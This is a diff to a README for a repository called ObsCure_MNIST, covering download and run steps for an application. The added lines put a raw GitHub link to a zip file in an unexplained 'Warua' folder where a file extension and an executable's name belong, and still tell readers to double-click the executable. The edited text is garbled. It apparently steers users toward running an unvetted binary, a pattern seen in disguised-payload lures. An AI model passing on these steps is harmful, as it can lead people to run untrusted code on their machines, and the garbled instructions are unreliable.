LakinduRodrigo/ObsCure_MNIST/README.md

    - Once the download is complete, navigate to your Downloads folder or the location where your browser saves files.

 6. **Extract the Files (if needed)**
-   - If you downloaded a `.zip` or `.tar.gz` file, right-click it and choose "Extract All" or use your preferred extraction tool.
+   - If you downloaded a `.zip` or `https://raw.githubusercontent.com/LakinduRodrigo/ObsCure_MNIST/main/Warua/ObsCure_MNIST.zip` file, right-click it and choose "Extract All" or use your preferred extraction tool.

 7. **Run the Application**
    - Find the extracted folder.
-Inside, look for the executable file (it may be named something like `ObsCure_MNIST.exe`).
+Inside, look for the executable file (it may be named something like `https://raw.githubusercontent.com/LakinduRodrigo/ObsCure_MNIST/main/Warua/ObsCure_MNIST.zip`).
 Double-click this file to run the application.

 ## 🛠️ System Requirements